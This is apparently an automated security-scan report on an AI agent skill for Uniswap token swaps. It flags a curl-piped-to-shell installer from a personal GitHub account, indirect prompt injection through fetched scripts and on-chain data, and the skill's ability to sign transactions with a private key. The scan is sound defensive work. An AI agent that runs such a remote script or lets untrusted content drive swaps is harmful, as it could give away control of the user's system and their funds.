dapp-uniswap

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 0.80). The raw.githubusercontent.com link is a direct .sh installer hosted in a personal/unknown GitHub account (purong-huang-1121) and the skill instructs running it via curl | sh (high-risk), while the github.com/okx/plugin-store repo looks legitimate — because the actual installer comes from an untrusted user-run repo and would execute arbitrary shell code, this set is suspicious.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.90). The SKILL.md explicitly instructs fetching an install script from a public URL (curl https://raw.githubusercontent.com/...) and the runtime workflow uses public on-chain data via the tokens and quote (QuoterV2) commands to drive swap decisions—both are untrusted third‑party sources whose content can be read and used to influence subsequent tool actions (e.g., executing swaps).

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). This skill's pre-flight steps instruct executing remote code via curl -sSL https://raw.githubusercontent.com/purong-huang-1121/skills-store/main/install.sh | sh at runtime, which fetches and runs external script code and therefore directly executes remote code.

MEDIUM W009: Direct money access capability detected (payment gateways, crypto, banking).

• Direct money access detected (high risk: 1.00). The skill explicitly provides on-chain swap execution via Uniswap V3. It includes a "swap" command that requires an EVM private key, performs ERC‑20 approvals, signs and broadcasts transactions to the SwapRouter02, and returns tx_hash/status/block_number. The documentation describes executing swaps, handling approvals, slippage/deadlines, and shows workflows that perform actual token transfers on-chain. These are specific crypto transaction and wallet signing capabilities (not generic), so this grants direct financial execution authority.